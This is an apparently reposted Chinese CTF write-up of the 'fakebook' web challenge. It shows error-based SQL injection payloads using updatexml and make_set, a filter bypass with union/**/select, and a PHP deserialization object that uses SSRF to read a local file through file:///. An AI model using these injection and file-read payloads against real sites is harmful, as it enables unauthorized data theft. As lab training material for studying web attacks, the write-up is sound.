[PHP知识库] 功法世界fakebook

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> 功法世界fakebook -> 正文阅读

[PHP知识库]功法世界fakebook

打卡之后

发现有login 还有join

先从login开始做起,发现登入界面,post 型尝试一下抓包注入

请添加图片描述

右键copy to file 提取成 txt 文件尝试无果

尝试扫描一下目录

请添加图片描述

尝试访问flag.php 无果那就应该访问不到继续走

那就分析 join 首先注册之后一点发现

/view.php?no=1

发现注入点

?no=1 and 1=1 正常
?no=1 and 1=2

请添加图片描述

出现报错信息,并暴露出路径

利用报错注入payload

1 and updatexml(1,concat(0x7e,(select group_conat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+

请添加图片描述

发现出现这个,经测试是过滤了0x7e 0x5e 等等当然将0x7e 带换成’~'是可以的

-1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),1)--+

搜一些大佬解法是利用

1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

补充make_set: 简单的来说就是第一个参数将其转成二进制数并逆置然后将后面的参数依次到对应的二进制位上,输出

然后就是提取列名

-1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name='users')),1)#

-1 and updatexml(1,make_set(3,'~',(select data from users)),1)#

请添加图片描述

发现是发序列化的数据,emm 就没思路了

后来知道是查看robots.txt 得到备份文件

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();//初始化curl会话

        curl_setopt($ch, CURLOPT_URL, $url);//设置要抓去的url
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

发现是对url 的请求，并没有对url 进行任何的过滤所以存在ssrf攻击

那末思路有了

利用反序列化 file:///命令对内容进行flag 请求

<?php
class UserInfo
{
    public $name = "1";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";



}
$a = new UserInfo();
echo serialize($a);

判断出列数有4列 (从3开始试就完了只有4正常),但是这里的union select 被过滤了

不知道试过滤的啥思路又断了看大佬wp 是说没过滤完全:

构造:union/**/select 即可

最后payload

http://111.200.241.244:53194/view.php?no=-1%20%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:1:%221%22;s:3:%22age%22;i:0;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27

请添加图片描述